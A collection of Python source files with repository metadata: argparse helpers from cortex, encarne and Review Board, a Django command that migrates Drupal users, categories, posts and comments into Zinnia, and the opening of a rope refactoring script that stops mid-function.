subparser.add_argument(
arg_str, dest=k, action=action, default=False, help=help)
elif isinstance(v, bool):
type_ = type(v)
metavar = '<' + type_.__name__ + '> (default=' + str(v) + ')'
subparser.add_argument(
arg_str,
dest=k,
default=True,
metavar=metavar,
type=str2bool,
help=help)
else:
type_ = type(v) if v is not None else str
metavar = '<' + type_.__name__ + '> (default=' + str(v) + ')'
subparser.add_argument(
arg_str,
dest=k,
choices=choices,
metavar=metavar,
default=v,
type=type_,
help=help)
def parse_args(models, model=None):
    '''Parse the command line arguments.

    Args:
        models: dictionary of models.
        model: optional single model; when given, its arguments are added
            directly to the top-level parser instead of per-model subparsers.

    Returns:
        argparse.Namespace with a `command` attribute (None when no
        subcommand machinery was used).
    '''
    parser = make_argument_parser()
    if model is None:
        # One subcommand per registered model, plus `setup`.
        subparsers = parser.add_subparsers(
            title='Cortex',
            help='Select an architecture.',
            description='Cortex is a wrapper '
            'around pytorch that makes training models '
            'more convenient.',
            dest='command')
        subparsers.add_parser(
            'setup', help='Setup cortex configuration.',
            description='Initializes or updates the `.cortex.yml` file.')
        for k, model in models.items():
            model_help, model_description = parse_header(model)
            subparser = subparsers.add_parser(
                k,
                help=model_help,
                description=model_description,
                formatter_class=lambda prog: argparse.HelpFormatter(
                    prog, max_help_position=50, width=100))
            _parse_model(model, subparser)
    else:
        _parse_model(model, parser)
    command = sys.argv[1:]
    # Indices of short (single-dash) options: argparse requires the generic
    # top-level options to precede the subcommand, so they are moved to the
    # front of the argument list together with their values.
    idx = []
    for i, c in enumerate(command):
        if c.startswith('-') and not(c.startswith('--')):
            idx.append(i)
    header = []
    # argparse is picky about ordering
    for i in idx[::-1]:
        a = None
        # Take the token following the option as its value, unless that token
        # is itself another option (then the option is treated as a flag).
        if i + 1 < len(command):
            a = command[i + 1]
        if a is not None and (a.startswith('-') or a.startswith('--')):
            a = None
        if a is not None:
            a = command.pop(i + 1)
            c = command.pop(i)
            header += [c, a]
        else:
            c = command.pop(i)
            header.append(c)
    command = header + command
    args = parser.parse_args(command)
    # `command` only exists on the namespace when subparsers were added.
    if not hasattr(args, 'command'):
        args.command = None
    return args
def update_args(kwargs, kwargs_to_update):
    """Recursively merge *kwargs* into *kwargs_to_update*, in place.

    Nested dicts present on both sides are merged key-by-key; any other
    value (including a dict absent from the target) overwrites or is
    inserted directly.
    """
    for key, value in kwargs.items():
        if isinstance(value, dict) and key not in kwargs_to_update:
            kwargs_to_update[key] = value
        elif isinstance(value, dict) and isinstance(kwargs_to_update[key], dict):
            update_args(value, kwargs_to_update[key])
        else:
            kwargs_to_update[key] = value
| {
"repo_name": "rdevon/cortex",
"path": "cortex/_lib/parsing.py",
"copies": "1",
"size": "11374",
"license": "bsd-3-clause",
"hash": 2069801486658089200,
"line_mean": 29.3306666667,
"line_max": 79,
"alpha_frac": 0.5218920345,
"autogenerated": false,
"ratio": 3.880586830433299,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4902478864933299,
"avg_score": null,
"num_lines": null
} |
"""Argument parsing."""
import argparse
from encarne.stats import show_stats, clean_movies
# Specifying commands
parser = argparse.ArgumentParser(
description='Encarne reencoder')
parser.add_argument(
'-d', '--directory', type=str,
help='Directory that should be explored for video container to be encoded.')
parser.add_argument(
'-s', '--size', type=str,
help='Specify minimun encoding file size (11GB, 100MB, ...).')
# Encoding stuff
parser.add_argument(
'-c', '--crf', type=int, choices=range(0, 51),
help='Constant rate factor for ffmpeg.')
preset_values = ['ultrafast', 'superfast', 'veryfast',
'faster', 'fast', 'medium', 'slow', 'slower',
'veryslow', 'placebo']
parser.add_argument(
'-p', '--preset', type=str, choices=preset_values,
help='Compression preset for ffmpeg.')
audio_values = ['aac', 'flac', 'None']
parser.add_argument(
'-a', '--audio', type=str, choices=audio_values,
help='Audio encoding for ffmpeg.')
parser.add_argument(
'-ba', '--kbitrate-audio', type=str,
help='Audio encoding bitrate (e.g. 128k or not specified for flac).')
parser.add_argument(
'-t', '--threads', type=int,
help='The threads used for encoding.')
# Initialize supbparser
subparsers = parser.add_subparsers(
title='Subcommands', description='Various client')
# Status
stat_subcommand = subparsers.add_parser(
'stat', help='Show some statistics.',
)
stat_subcommand.set_defaults(func=show_stats)
# clean
clean_subcommand = subparsers.add_parser(
'clean', help='Check if any movies have been removed.',
)
clean_subcommand.set_defaults(func=clean_movies)
| {
"repo_name": "Nukesor/encarne",
"path": "encarne/argument_parser.py",
"copies": "1",
"size": "1664",
"license": "mit",
"hash": -6722204257746585000,
"line_mean": 27.6896551724,
"line_max": 80,
"alpha_frac": 0.6706730769,
"autogenerated": false,
"ratio": 3.4522821576763487,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.46229552345763486,
"avg_score": null,
"num_lines": null
} |
# Argument parsing/user input.
import argparse
import getpass
# Timestamp and date processing.
from datetime import datetime
import pytz
# ORM for Drupal database.
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# String utiilities.
import urllib
# Django imports.
from django.core.management.base import BaseCommand, CommandError
from django.template.defaultfilters import slugify
from django.db import IntegrityError, transaction
from django.contrib.contenttypes.models import ContentType
# Django models.
from django.contrib.sites.models import Site
from django_comments import get_model as get_comment_model
# Zinnia models.
from zinnia.models import Author
from zinnia.models import Category
from zinnia.models import Entry
from zinnia.managers import PUBLISHED
# For preventing pingbacks during the import.
from zinnia.signals import disconnect_entry_signals
from zinnia.signals import disconnect_discussion_signals
# Retrieve the model used for comments.
Comment = get_comment_model()
#########################################
# Helper functions for argument parsing #
#########################################
class MappingAction(argparse.Action):
    """argparse action that builds a dictionary from colon-separated mappings.

    Accepts arguments of format:

        arg1[=maparg1]:arg2[=maparg2]:...:argN[=mapargN]

    Each ``arg=maparg`` pair becomes a key/value entry in a dictionary stored
    on the namespace. The ``=maparg`` part is optional; a bare ``arg`` maps to
    itself (i.e. ``arg1=maparg1:arg2`` yields ``{arg1: maparg1, arg2: arg2}``).
    Repeated use of the option accumulates into the same dictionary.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        # Lazily create the target dictionary on first use.
        if not getattr(namespace, self.dest):
            setattr(namespace, self.dest, dict())

        target = getattr(namespace, self.dest)
        for item in values.split(":"):
            key, sep, value = item.partition("=")
            # Without '=', the key maps to itself.
            target[key] = value if sep else key
class DrupalDatabase(object):
    """
    Helper class for accessing the Drupal database. This class is a small
    wrapper around the functionality provided by SQLAlchemy.

    Properties:

      session - SQLAlchemy session object that can be used for running queries
      against the Drupal database.

      Node - Drupal's 'node' table.
      NodeRevisions - Drupal's 'node_revisions' table.
      Users - Drupal's 'users' table.
      Vocabulary - Drupal's 'vocabulary' table.
      TermNode - Drupal's 'term_node' table.
      TermData - Drupal's 'term_data' table.
      TermHierarchy - Drupal's 'term_hierarchy' table.
      Comments - Drupal's 'comments' table.
    """

    def __init__(self, engine):
        """
        Initialises the SQLAlchemy ORM for Drupal tables using the provided
        engine.

        Arguments:

          engine
            Initialised SQLAlchemy engine to use when setting-up ORM.
        """
        # Store the engine and set-up a session that will be used for queries.
        self.engine = engine
        self.session = sessionmaker(bind=self.engine)()
        # NOTE(review): passing the engine positionally binds it to the
        # declarative base (legacy SQLAlchemy API); 'autoload' below reflects
        # each table's columns from the live database at class-creation time.
        Base = declarative_base(self.engine)

        # Declare Drupal ORM classes.
        class Node(Base):
            """
            For accessing Drupal's "node" table. This table contains mainly metadata
            about a node.
            """
            __tablename__ = 'node'
            __table_args__ = {'autoload': True}

        class NodeRevisions(Base):
            """
            For accessing Drupal's "node_revisions" table. This table contains the
            actual content of nodes.
            """
            __tablename__ = 'node_revisions'
            __table_args__ = {'autoload': True}

        class Users(Base):
            """
            For accessing Drupal's "users" table. This table contains information about
            users.
            """
            __tablename__ = 'users'
            __table_args__ = {'autoload': True}

        class Vocabulary(Base):
            """
            For accessing Drupal's "vocabulary" table. This table contains information
            about Drupal vocabularies (tags and categories).
            """
            __tablename__ = 'vocabulary'
            __table_args__ = {'autoload': True}

        class TermNode(Base):
            """
            For accessing Drupal's "term_node" table. This table contains information about
            mapping of terms from vocabulaires to nodes.
            """
            __tablename__ = 'term_node'
            __table_args__ = {'autoload': True}

        class TermData(Base):
            """
            For accessing Drupal's "term_data" table. This table contains data about
            terms.
            """
            __tablename__ = 'term_data'
            __table_args__ = {'autoload': True}

        class TermHierarchy(Base):
            """
            For accessing Drupal's "term_hierarchy" table. This table contains data
            about term hierarchies (used for importing categories).
            """
            __tablename__ = 'term_hierarchy'
            __table_args__ = {'autoload': True}

        class Comments(Base):
            """
            For accessing Drupal's "comments" table. This table contains comment data.
            """
            __tablename__ = 'comments'
            __table_args__ = {'autoload': True}

        # Easier access to SQLAlchemy ORM.
        self.Node = Node
        self.NodeRevisions = NodeRevisions
        self.Users = Users
        self.Vocabulary = Vocabulary
        self.TermNode = TermNode
        self.TermData = TermData
        self.TermHierarchy = TermHierarchy
        self.Comments = Comments
def import_users(drupal, users=None, custom_mapping=None):
"""
Imports the requested users from Drupal database, taking into account any
desired custom mappings between usernames. Generates a mapping dictionary
between Drupal and Zinnia users.
Users will be created only if they do not already exist.
Arguments:
drupal
Drupal database from which the users should be imported. Should be an
instance of DrupalDatabase.
users
List of users that should be imported. If provided, only the specified
users will be imported from Drupal. Default (None) is to import all
users.
custom_mapping
Dictionary defining desired custom mapping between Drupal users and
Zinnia users. Keys should be usernames in Drupal, and values should be
desired usernames in Zinnia. Default (None) is to not to apply any
custom mapping.
Returns:
Tuple consisting out of two elements. The first element is dictionary with
import statistics (keys 'drupal_total', 'zinnia_new', and
'zinnia_existing'). The second element is a dictionary describing the
resulting mapping between the Drupal and Zinnia users, where keys are
Drupal user IDs, and values are Zinnia user IDs (not to be confused with
custom_mapping).
"""
mapping = {}
# Fetch the users from Drupal (all or just a subset).
if users:
drupal_users = drupal.session.query(drupal.Users).filter(drupal.Users.name.in_(users))
else:
drupal_users = drupal.session.query(drupal.Users).filter(drupal.Users.name != "")
# Set-up the statistics.
statistics = {
'drupal_total': drupal_users.count(),
'zinnia_new': 0,
'zinnia_existing': 0,
}
# Process each Drupal user.
for drupal_user in drupal_users:
# Apply mapping if it was provided.
username = custom_mapping.get(drupal_user.name, drupal_user.name)
# Fetch the user if it already exists, or create a new one if it
# doesn't.
try:
author = Author.objects.get(username=username)
print "User already exists: %s" % username
statistics["zinnia_existing"] += 1
except Author.DoesNotExist:
author = Author.objects.create_user(username, drupal_user.mail)
# Set the user password. "pass" is a reserved keyword in Python, so
# we must use the getattr here.
author.password = "md5$$%s" % getattr(drupal_user, "pass")
author.is_staff = True
author.save()
print "Added user: %s" % username
statistics["zinnia_new"] += 1
mapping[drupal_user.uid] = author.id
return statistics, mapping
def import_categories(drupal):
    """
    Imports categories from Drupal into Zinnia. Categories are created only if
    they do not exist. In addition, the Drupal vocabulary is treated as a
    (top-level) category on its own when moved into Zinnia.

    LIMITATION: The implementation assumes that all categories (terms in non-tag
    vocabularies) in Drupal have _unique_ names. This in return simplifies the
    import code (for determining whether the category needs to be created, or
    existing one should be used).

    Arguments:

      drupal
        Drupal database from which the categories should be imported. Should be
        an instance of DrupalDatabase.

    Returns:
      Tuple consisting out of two elements. The first element is dictionary with
      import statistics (keys 'drupal_total', 'zinnia_new', and
      'zinnia_existing'). The second is a dictionary describing mapping between
      the Drupal and Zinnia categories, where keys are Drupal category IDs, and
      values are Zinnia category IDs.
    """
    mapping = {}
    # Dictionary representing hierarchy of Drupal categories. Key corresponds to
    # child, value corresponds to child's parent. If parent is set to "0", the
    # category is supposed to be top-level.
    hierarchy = {}
    # Set-up the statistics.
    statistics = {
        "drupal_total": 0,
        "zinnia_new": 0,
        "zinnia_existing": 0,
    }
    # Drupal stores categories within a number of vocabularies. Extract all
    # vocabularies that are not defining tags (that is, extract all category
    # vocabularies).
    vocabularies = drupal.session.query(drupal.Vocabulary).filter(drupal.Vocabulary.tags != 1)
    # Import the categories from each vocabulary.
    for vocabulary in vocabularies:
        # Treat vocabulary itself as a category (top-level one).
        statistics["drupal_total"] += 1
        # Try to fetch existing, or create new category in Zinnia.
        category, created = Category.objects.get_or_create(title=vocabulary.name, slug=slugify(vocabulary.name), description=vocabulary.description)
        if created:
            statistics["zinnia_new"] += 1
        else:
            statistics["zinnia_existing"] += 1
        # Since vocabularies are not categories, use the vocabulary _name_ as
        # identifier instead of primary key (in order to avoid collision with
        # categories).
        mapping[vocabulary.name] = category.pk
        # Vocabulary "category" has no parents.
        hierarchy[vocabulary.name] = 0
        # Look-up the terms that belong to the vocabulary.
        term_query = drupal.session.query(drupal.TermData).filter(drupal.TermData.vid == vocabulary.vid)
        statistics["drupal_total"] += term_query.count()
        # Process each term item.
        for term in term_query:
            # Each term has exactly one row in term_hierarchy giving its parent.
            term_parent = drupal.session.query(drupal.TermHierarchy).filter(drupal.TermHierarchy.tid == term.tid).first().parent
            # If this is a top-level category in vocabulary, mark the vocabulary
            # pseudo-category itself as its parent instead (refer to vocabulary
            # "category" by its name).
            if term_parent == 0:
                term_parent = vocabulary.name
            # Set-up hierarchy information for this category.
            hierarchy[term.tid] = term_parent
            # Try to fetch existing, or create new category in Zinnia.
            category, created = Category.objects.get_or_create(title=term.name, slug=slugify(term.name), description=term.description)
            if created:
                statistics["zinnia_new"] += 1
            else:
                statistics["zinnia_existing"] += 1
            # Map the Drupal category to Zinnia category.
            mapping[term.tid] = category.pk
    # Update parent information for Zinnia categories (if they're not
    # top-level ones).
    # NOTE(review): dict.iteritems() — this module targets Python 2.
    for tid, tid_parent in hierarchy.iteritems():
        if tid_parent != 0:
            category = Category.objects.get(pk=mapping[tid])
            category.parent = Category.objects.get(pk=mapping[tid_parent])
            category.save()
    return statistics, mapping
def extract_tags(drupal):
    """
    Extracts tags from Drupal database. While being extracted the tags will be
    stripped of forward slashes ('/'), replacing them with hyphens ('-').

    Tags do not exist in Zinnia as objects of their own, so no creation of tags
    needs to take place there. This function will mainly allow us to reduce
    database workload (of traversing Drupal database) by having (id, tag) pairs
    in a dictionary.

    Arguments:

      drupal
        Drupal database from which the tags should be extracted. Should be an
        instance of DrupalDatabase.

    Returns:
      Dictionary mapping the Drupal tag term ID into tag string.
    """
    tag_mapping = {}
    # Only vocabularies flagged as tag vocabularies are relevant here.
    tag_vocabularies = drupal.session.query(drupal.Vocabulary).filter(drupal.Vocabulary.tags == 1).all()
    for vocabulary in tag_vocabularies:
        # Fetch all terms of this tag vocabulary and record them. The tags in
        # Zinnia are not allowed to contain slashes.
        terms = drupal.session.query(drupal.TermData).filter(drupal.TermData.vid == vocabulary.vid).all()
        tag_mapping.update(
            (term.tid, term.name.replace("/", "-")) for term in terms)
    return tag_mapping
def import_comments(drupal, drupal_node, zinnia_entry, threaded_comments, user_mapping):
    """
    Imports comments from Drupal node into Zinnia entry. Comments are created
    only if they do not exist already.

    Arguments:

      drupal
        Drupal database from which the comments should be extracted. Should be an
        instance of DrupalDatabase.

      drupal_node
        Drupal node object from which the comments should be imported.

      zinnia_entry
        Zinna entry to which the comments should be attached.

      threaded_comments
        Specify whether the comments should be imported as threaded or not. If
        set to True, zinnia-threaded-comments application must be installed as
        well.

      user_mapping
        Mapping between Drupal user ID's and Zinnia user ID's. Generated by
        import_users() function.

    Returns:
      Dictionary with import statistics (keys 'drupal_total', 'zinnia_new', and
      'zinnia_existing')
    """
    # Fetch the current Django site.
    site = Site.objects.get_current()
    # Holds mapping between comment IDs in Drupal and Comment IDs in
    # Zinnia. This is used later on if setting-up threaded comment parents.
    comment_mapping = {}
    # Holds information about parent/child relatinships of Drupal comments. Keys
    # are comment IDs of children, while values are comment IDs of parents.
    hierarchy = {}
    # Fetch all comments for a specific node, ordering them by creation
    # timestamps.
    drupal_comments = drupal.session.query(drupal.Comments).filter(drupal.Comments.nid == drupal_node.nid).order_by(drupal.Comments.timestamp)
    # Set-up some statistics.
    statistics = {
        "drupal_total": drupal_comments.count(),
        "zinnia_new": 0,
        "zinnia_existing": 0,
    }
    # Process all comments from relevant Drupal node.
    for drupal_comment in drupal_comments:
        # If it was not the guest account that posted the comment, fetch the
        # user if possible.
        zinnia_comment_user = None
        if drupal_comment.uid in user_mapping:
            zinnia_comment_user = Author.objects.get(pk=user_mapping[drupal_comment.uid])
        else:
            zinnia_comment_user = None
        # Try to fetch existing, or create new comment in Zinnia.
        # NOTE(review): assumes Drupal comment status 0 means "published" —
        # confirm against the source site's Drupal version.
        comment, created = Comment.objects.get_or_create(comment=drupal_comment.comment,
                                                         ip_address=drupal_comment.hostname,
                                                         submit_date=datetime.fromtimestamp(drupal_comment.timestamp, pytz.UTC),
                                                         is_public=True if drupal_comment.status == 0 else False,
                                                         user=zinnia_comment_user,
                                                         user_name=drupal_comment.name,
                                                         user_email=drupal_comment.mail,
                                                         user_url=drupal_comment.homepage,
                                                         object_pk=zinnia_entry.pk,
                                                         site_id=site.pk,
                                                         content_type=ContentType.objects.get_for_model(Entry),)
        if created:
            statistics["zinnia_new"] += 1
        else:
            statistics["zinnia_existing"] += 1
        # Store mapping information between Drupal and Zinnia comments (used
        # later on if setting-up hierarchy for threaded comments).
        comment_mapping[drupal_comment.cid] = comment.pk
        # Store parent/child information for threaded comments.
        hierarchy[drupal_comment.cid] = drupal_comment.pid
    # Update comment parent/child relationships if threaded comments were
    # enabled.
    # NOTE(review): dict.iteritems() — this module targets Python 2.
    if threaded_comments:
        for cid, cid_parent in hierarchy.iteritems():
            if cid_parent != 0:
                comment = Comment.objects.get(pk=comment_mapping[cid])
                comment.parent = Comment.objects.get(pk=comment_mapping[cid_parent])
                comment.save()
    # Fix counters.
    zinnia_entry.comment_count = zinnia_entry.comments.count()
    zinnia_entry.pingback_count = zinnia_entry.pingbacks.count()
    zinnia_entry.trackback_count = zinnia_entry.trackbacks.count()
    zinnia_entry.save(force_update=True)
    return statistics
def import_content(drupal, user_mapping, category_mapping, tag_mapping, node_type, threaded_comments):
    """
    Imports content from Drupal into Zinnia. Content is created only if it does
    not exist already.

    Arguments:

      drupal
        Drupal database from which the content should be imported. Should be an
        instance of DrupalDatabase.

      user_mapping
        Mapping between Drupal user ID's and Zinnia user ID's. Generated by
        import_users() function.

      category_mapping
        Mapping between Drupal category ID's and Zinnia category ID's. Generated
        by import_categories() function.

      tag_mapping
        Mapping between Drupal tag ID's and Zinnia tag strings. Generated by
        extract_tags() function.

      node_type
        Drupal node type that should be processed. Only the nodes belonging to
        the specified node type will be processed.

      threaded_comments
        Specify whether the comments should be imported as threaded or not. If
        set to True, zinnia-threaded-comments application must be installed as
        well.

    Returns:
      Dictionary with import statistics (keys 'drupal_total', 'zinnia_new', and
      'zinnia_existing').
    """
    # Get a list of all nodes of specific type, sorting them by date of
    # creation. Nodes owned by users outside of user_mapping are skipped.
    nodes = drupal.session.query(drupal.Node).filter(drupal.Node.type == node_type,
                                                     drupal.Node.uid.in_(user_mapping.keys())).order_by(drupal.Node.created)
    # Set-up statistics dictionary.
    statistics = {
        "drupal_total": nodes.count(),
        "zinnia_new": 0,
        "zinnia_existing": 0,
    }
    # Process each node.
    for node in nodes:
        # Extract the last revision of the node (highest vid); older
        # revisions are dropped since Zinnia keeps no revision history.
        revisions = drupal.session.query(drupal.NodeRevisions).filter(drupal.NodeRevisions.nid == node.nid)
        # Extract node data.
        last = revisions.order_by(drupal.NodeRevisions.vid.desc()).first()
        body = last.body
        title = last.title
        modified = datetime.fromtimestamp(last.timestamp, pytz.UTC)
        created = datetime.fromtimestamp(node.created, pytz.UTC)
        user = user_mapping[node.uid]
        # Create the entry if it doesn't exist already.
        # NOTE: 'created' (a datetime) is rebound here to get_or_create()'s
        # boolean "was created" flag; the datetime was already consumed by
        # the lookup arguments above.
        zinnia_entry, created = Entry.objects.get_or_create(content=body, creation_date=created,
                                                            publication_date=created,
                                                            last_update=modified, title=title,
                                                            status=PUBLISHED, slug=slugify(title))
        if created:
            # Add relations (authors etc).
            zinnia_entry.authors.add(user)
            zinnia_entry.sites.add(Site.objects.get_current())
            zinnia_entry.save()
            # Import tags. Only terms present in tag_mapping become tags.
            version_tags = drupal.session.query(drupal.TermNode).filter(drupal.TermNode.nid == last.nid, drupal.TermNode.vid == last.vid).all()
            zinnia_entry.tags = ",".join([tag_mapping[t.tid] for t in version_tags if t.tid in tag_mapping])
            zinnia_entry.save()
            # Set-up categories for entry. Only terms present in
            # category_mapping become categories.
            categories_query = drupal.session.query(drupal.TermNode).filter(drupal.TermNode.nid == last.nid, drupal.TermNode.vid == last.vid)
            categories = [category_mapping[v.tid] for v in categories_query if v.tid in category_mapping]
            zinnia_entry.categories.add(*[c for c in categories])
            zinnia_entry.save()
            # Import comments for an entry.
            import_comments(drupal, node, zinnia_entry, threaded_comments, user_mapping)
            statistics["zinnia_new"] += 1
            print "Imported entry '%s'" % title
        else:
            # Entry already exists (matched all get_or_create fields).
            statistics["zinnia_existing"] += 1
            print "Skipping existing entry '%s'" % title
    return statistics
###########
# Command #
###########
class Command(BaseCommand):
    """
    Implements a custom Django management command used for importing Drupal blog
    into Zinnia.
    """
    help = """
    Imports Drupal content into Zinnia.
    The command will import the following:
    - User information (username and mail only).
    - Categories.
    - Node content.
    - Node comments (threaded, if using zinnia_threaded_comments).
    Currently the script has the following limitations:
    - No conversion of additional user information is performed.
    - No conversion of formatting is performed. Content is copied as-is.
    - Supports only MySQL-compatible database.
    - Revision history is not preserved (Django Blog Zinnia does not support
    revision history). Only the latest/current revision will be imported.
    - Comment _titles_ are not preserved (Django Blog Zinnia does not support
    comment titles)
    """
    def add_arguments(self, parser):
        # Register the CLI options accepted by this management command.
        parser.add_argument("-H", "--database-hostname", type=str, default="localhost",
                            help="Hostname of database server providing the Drupal database. Default is 'localhost'.")
        parser.add_argument("-p", "--database-port", type=int, default=3306,
                            help="TCP port at which the database server is listening. Default is '3306'.")
        parser.add_argument("-u", "--database-username", type=str, default="root",
                            help="Username that should be used for connecting to database server. Default is 'root'.")
        # -P takes a *path* to a password file (note the dest); the actual
        # password is resolved in handle().
        parser.add_argument("-P", "--database-password", type=str, default=None,
                            dest="database_password_file",
                            help="Path to file containing the password for specified database username. If not set (default), the password will be read interactively.")
        parser.add_argument("-n", "--node-type", type=str, default="blog",
                            help="Drupal Node type that should be processed. Default is 'blog'.")
        parser.add_argument("-m", "--user-mapping", action=MappingAction, default=dict(),
                            help="Mapping of Drupal usernames to Zinnia usernames. Format is 'duser1=zuser1:duser2=zuser2:...:dusern=zusern'. Default is to use same username as in Drupal.")
        parser.add_argument("-U", "--users", type=str, default=None,
                            help="Comma-separated list of Drupal users that should be imported, including user-created content. Default is to import content from all users.")
        parser.add_argument("-t", "--threaded-comments", action="store_true",
                            default=False, dest="threaded_comments",
                            help="Import comments while preserving threading information. Requires zinnia-threaded-comments application. Default is not to use threaded comments.")
        parser.add_argument("database_name", type=str,
                            help="Name of the database")
    def handle(self, database_name, **options):
        # Verify that the configured comment model supports threading before
        # doing any work, since threaded import needs a 'parent' attribute.
        if options['threaded_comments'] and not hasattr(Comment, "parent"):
            raise CommandError("Currently configured comment model does not have the 'parent' attribute, but threaded comment import has been requested. Check your COMMENTS_APP setting.")
        # Read the password for Drupal database if it wasn't provided within a file.
        if options['database_password_file']:
            options['database_password'] = open(options['database_password_file'], "r").read().rstrip().lstrip()
        else:
            options['database_password'] = getpass.getpass("Database password for '%s'@'%s': " % (options['database_username'], database_name))
        # Set-up SQLAlchemy ORM. Credentials are URL-quoted to survive
        # special characters in the DSN.
        database_connection_url = "mysql://%s:%s@%s/%s" % (urllib.quote(options['database_username']),
                                                           urllib.quote(options['database_password']),
                                                           urllib.quote(options['database_hostname']),
                                                           urllib.quote(database_name))
        engine = create_engine(database_connection_url)
        drupal = DrupalDatabase(engine)
        # Create list of users that should be imported (None means all).
        users = options["users"]
        if users:
            users = users.split(",")
        # Disconnect Zinnia signals so the bulk import does not trigger
        # per-object discussion/entry side effects.
        disconnect_discussion_signals()
        disconnect_entry_signals()
        # Import the users.
        with transaction.atomic():
            user_stats, user_mapping = import_users(drupal, users=users, custom_mapping=options["user_mapping"])
        # Import the categories.
        with transaction.atomic():
            category_stats, category_mapping = import_categories(drupal)
        # Extract the tag mapping.
        with transaction.atomic():
            tag_mapping = extract_tags(drupal)
        # Finally, import the actual content.
        with transaction.atomic():
            content_stats = import_content(drupal, user_mapping, category_mapping, tag_mapping, options['node_type'], options["threaded_comments"])
        # Output a summary.
        print
        print "User import summary"
        print "==================="
        for key, value in user_stats.iteritems():
            print "%s: %s" % (key, value)
        print
        print "Category import summary"
        print "======================="
        for key, value in category_stats.iteritems():
            print "%s: %s" % (key, value)
        print
        print "Content import summary"
        print "======================"
        for key, value in content_stats.iteritems():
            print "%s: %s" % (key, value)
| {
"repo_name": "azaghal/zinnia-drupal",
"path": "zinnia_drupal/management/commands/drupal62zinnia.py",
"copies": "1",
"size": "28475",
"license": "bsd-3-clause",
"hash": -5674756424895577000,
"line_mean": 37.7414965986,
"line_max": 189,
"alpha_frac": 0.6206496927,
"autogenerated": false,
"ratio": 4.2981132075471695,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5418762900247169,
"avg_score": null,
"num_lines": null
} |
"""Argument parsing utilities for command line tools."""
from __future__ import unicode_literals
import argparse
import os
import sys
import reviewboard
from reviewboard.cmdline.utils.console import get_console
class HelpFormatter(argparse.RawDescriptionHelpFormatter):
    """Help formatter that wraps each paragraph of text individually."""

    # Number of spaces used for the default line indentation when the
    # caller does not supply an explicit indent string.
    indent_len = 2

    def _fill_text(self, text, width, indent):
        """Return the description text wrapped paragraph-by-paragraph.

        Each paragraph (separated by a newline) is wrapped on its own, so
        paragraph boundaries survive the re-flow.

        Args:
            text (unicode):
                The text to wrap.

            width (int, unused):
                The terminal width.

            indent (unicode, unused):
                The string to prefix each line with, for indentation.

        Returns:
            unicode:
                The wrapped text.
        """
        effective_indent = indent or ' ' * self.indent_len
        console = get_console()
        wrapped_paragraphs = [
            console.wrap_text(paragraph, indent=effective_indent)
            for paragraph in text.split('\n')
        ]
        return '\n'.join(wrapped_paragraphs)
class RBProgVersionAction(argparse.Action):
    """Display the Review Board/command version.

    This is used instead of :py:mod:`argparse`'s default version handling
    in order to print text unindented and unwrapped.
    """

    def __init__(self, **kwargs):
        """Initialize the action.

        Args:
            **kwargs (dict):
                Keyword arguments for the action.
        """
        # The action consumes no values from the command line.
        super(RBProgVersionAction, self).__init__(nargs=0, **kwargs)

    def __call__(self, parser, *args, **kwargs):
        """Call the action.

        This will display the version information directly to the terminal
        and then exit.

        Args:
            parser (argparse.ArgumentParser):
                The argument parser that called this action.

            *args (tuple, unused):
                Unused positional arguments.

            **kwargs (dict, unused):
                Unused keyword arguments.
        """
        # Trailing empty entry yields a terminating newline after joining.
        version_lines = [
            'Review Board/%s %s' % (parser.prog,
                                    reviewboard.get_version_string()),
            'Python %s' % sys.version.splitlines()[0],
            'Installed to %s' % os.path.dirname(reviewboard.__file__),
            '',
        ]
        parser.exit(message='\n'.join(version_lines))
| {
"repo_name": "chipx86/reviewboard",
"path": "reviewboard/cmdline/utils/argparsing.py",
"copies": "2",
"size": "2373",
"license": "mit",
"hash": 8393015104043398000,
"line_mean": 26.9176470588,
"line_max": 74,
"alpha_frac": 0.5710071639,
"autogenerated": false,
"ratio": 4.680473372781065,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6251480536681066,
"avg_score": null,
"num_lines": null
} |
# Arguments are:
# 1. Working directory.
# (The rope project folder is hard-coded to .vim/.ropeproject below, unlike
#  the variant of this script that takes it as a second argument.)
import difflib
import io
import json
import os
import sys
import traceback
# Rope is an external dependency; if it is missing, report the failure to
# the editor as a JSON error record on stderr (matching the error protocol
# used by RopeRefactoring.watch below).
try:
    import rope
    from rope.base import libutils
    from rope.refactor.rename import Rename
    from rope.refactor.extract import ExtractMethod, ExtractVariable
    import rope.base.project
    import rope.base.taskhandle
except ImportError:
    # FIX: was a bare "except:", which would also swallow SystemExit and
    # KeyboardInterrupt; only an import failure should be reported here.
    jsonMessage = {'error': True, 'message': 'Rope not installed', 'traceback': '', 'type': 'ModuleNotFoundError'}
    sys.stderr.write(json.dumps(jsonMessage))
    sys.stderr.flush()

# Positional CLI argument: the workspace root directory. The rope project
# folder is fixed relative to that root in this variant of the script.
WORKSPACE_ROOT = sys.argv[1]
ROPE_PROJECT_FOLDER = '.vim/.ropeproject'
class RefactorProgress():
    """
    Progress snapshot of a running refactor task.

    Carries the task name, an optional status message, and the percentage
    of work completed so far.
    """

    def __init__(self, name='Task Name', message=None, percent=0):
        # Simple value object; no validation is performed.
        self.name, self.message, self.percent = name, message, percent
class ChangeType():
    """
    Change Type Enum

    Integer codes describing how a file is affected by a refactoring.
    """
    # File contents are modified in place.
    EDIT = 0
    # A new file is created.
    NEW = 1
    # An existing file is removed.
    DELETE = 2
class Change():
    """
    A single file change produced by a refactoring: the affected file path,
    the kind of change (EDIT/NEW/DELETE code) and a unified diff.
    """
    # Mirrors ChangeType so callers can also write Change.EDIT etc.
    EDIT = 0
    NEW = 1
    DELETE = 2

    def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
        self.filePath = filePath
        self.fileMode = fileMode
        self.diff = diff
def get_diff(changeset):
    """Return a unified diff for a single rope change.

    This is a copy of the code from the ChangeSet.get_description method
    found in Rope, adapted to produce a plain unified diff.

    Args:
        changeset: A rope change exposing ``new_contents``,
            ``old_contents`` and the affected ``resource``.

    Returns:
        The unified diff between old and new file contents as a string.
    """
    new = changeset.new_contents
    old = changeset.old_contents
    if old is None:
        if changeset.resource.exists():
            old = changeset.resource.read()
        else:
            # Brand new file: diff against empty content.
            old = ''
    # Ensure code has a trailing newline before generating a diff, so
